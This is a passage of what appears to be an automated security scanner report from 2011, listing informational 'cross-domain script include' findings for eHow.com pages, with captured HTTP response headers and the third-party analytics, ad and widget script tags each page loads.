               <meta chars
...[SNIP]...
<link type="text/css" href="http://v5-ui.ehowcdn.com/content/compressed/site-home-9003f536.css" rel="stylesheet" />
<script type="text/javascript" src="http://v5-ui.ehowcdn.com/content/compressed/common_header-130651af.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://v5-ui.ehowcdn.com/content/compressed/common_footer-e4fa775a.js"></script>
<script type="text/javascript" src="http://v5-ui.ehowcdn.com/content/compressed/site-home-b203ab9c.js"></script>
...[SNIP]...
</noscript>
<script src="http://vs.dmtracker.com/tags/vs.js"></script>
<script src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...

18.420. http://www.ehow.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 02 Feb 2011 15:11:14 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; path=/; HttpOnly
Set-Cookie: google-autocomplete=autocomplete; domain=.ehow.com; expires=Wed, 09-Feb-2011 15:11:14 GMT; path=/
Set-Cookie: oml=direct; path=/
Set-Cookie: oms=homepage; path=/
Vary: Accept-Encoding
Content-Length: 72396

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow | How To Do Just About Everything! | How To
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.421. http://www.ehow.com/MailingList.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/MailingList.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

18.422. http://www.ehow.com/about_us/about_us.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/about_us/about_us.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

18.423. http://www.ehow.com/about_us/contact_us.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/about_us/contact_us.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LfFhLsSAAAAABOLJY1x4rOxF3Wg5WvGWuumsQOt
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:31 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34323

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Contact Us | eHow.com</title>
       <meta charset="U
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LfFhLsSAAAAABOLJY1x4rOxF3Wg5WvGWuumsQOt">

</script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.424. http://www.ehow.com/about_us/faq_ehow.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/about_us/faq_ehow.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:31 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49798

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>FAQ | eHow.com</title>
       <meta charset="UTF-8" /
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.425. http://www.ehow.com/about_us/link_to_us.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/about_us/link_to_us.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:31 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31281

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Link to eHow | eHow.com</title>
       <meta c
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.426. http://www.ehow.com/account/simple_login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/account/simple_login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/simple-login-XGxhHA.js
http://vs.dmtracker.com/tags/vs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 02 Feb 2011 15:11:29 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 7187

<!DOCTYPE html>
<html id="www-ehow-com">
   <head>
       <title>Sign in to your eHow Account</title>
       <meta name="siteid" scheme="DMINSTR2" content="EHWC" />
       <meta name="pagetype" scheme="DMINSTR2
...[SNIP]...
</script>

       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>

       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/simple-login-XGxhHA.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
...[SNIP]...

18.427. http://www.ehow.com/account/simple_register.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/account/simple_register.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/simple-login-XGxhHA.js
http://vs.dmtracker.com/tags/vs.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:44:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
   <head>
       <title>Register fo
...[SNIP]...
</script>

       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>

       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/simple-login-XGxhHA.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
...[SNIP]...

18.428. http://www.ehow.com/ajax/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ajax/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/twitter-search-YOlODg.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:33 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60837

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Ajax - eHow.com</title>
       <meta charset="UTF-8"
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>


<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/topic-v2-4LSRhA.css"/>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/twitter-search-YOlODg.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.429. http://www.ehow.com/arts-and-crafts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/arts-and-crafts/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72043

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Arts & Crafts - How To Information | eHow.com</ti
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.430. http://www.ehow.com/arts-and-entertainment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/arts-and-entertainment/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71871

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Arts & Entertainment - How To Information | eHow.
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.431. http://www.ehow.com/beauty-and-personal-care/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/beauty-and-personal-care/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:47 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73539

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Beauty & Personal Care - How To Information | eHo
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.432. http://www.ehow.com/blog/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/blog/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/ehow.json?callback=twitterCallback2&count=5
http://ui.ehowcdn.com/content/compressed/en-US/blog-jdT4LA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:51 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78897

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Official eHow Blog - How To Do Just About Every
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/blog-qBnsRg.css"/>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/blog-jdT4LA.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
   <script type="text/javascript" src="http://twitter.com/statuses/user_timeline/ehow.json?callback=twitterCallback2&count=5"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.433. http://www.ehow.com/business/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/business/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:47 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75360

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Business - How To Information | eHow.com</title>
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.434. http://www.ehow.com/car-repair-and-maintenance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/car-repair-and-maintenance/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:47 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72547

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Car Repair & Maintenance - How To Information | e
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.435. http://www.ehow.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/careers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75391

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Careers - How To Information | eHow.com</title>

...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.436. http://www.ehow.com/cars/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/cars/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:48 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70732

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Cars - How To Information | eHow.com</title>
       <
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.437. http://www.ehow.com/community.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/community.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/community-rtlcow.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:02 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31215

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Community | eHow.com</title>
       <meta charset="UT
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/community-OUab6g.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/community-rtlcow.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.438. http://www.ehow.com/computer-software/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/computer-software/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:48 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72733

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Computer Software - How To Information | eHow.com
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.439. http://www.ehow.com/computers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/computers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74842

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Computers - How To Information | eHow.com</title>
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
